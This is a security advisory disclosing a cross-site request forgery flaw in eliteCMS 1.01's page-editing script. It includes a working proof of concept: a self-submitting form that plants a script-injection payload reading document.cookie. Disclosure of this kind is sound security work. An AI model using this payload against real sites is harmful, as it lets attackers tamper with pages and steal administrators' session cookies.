Vulnerability ID: HTB22355 Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_elitecms.html Product: eliteCMS Vendor: Elite Graphix Vulnerable Version: 1.01 and Probably Prior Versions Vendor Notification: 19 April 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Low Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the "/admin/edit_page.php" script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form action='http://www.example.com/admin/edit_page.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="keywords" type="hidden" value="eliteCMS, Elite CMS" /> <input name="description" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="menu_name" type="hidden" value="Home"/> <input name="position" type="hidden" value="1"/> <input name="active" type="hidden" value="1" /> <input name="home_page" type="hidden" value="1" /> <input name="sidebar" type="hidden" value="1" /> <input name="sidebar_align" type="hidden" value="left" /> <input name="contact_form" type="hidden" value="0" /> <input type="submit" name="submit" value="Update Page" /> </form> <script> document.frm.submit(); </script>
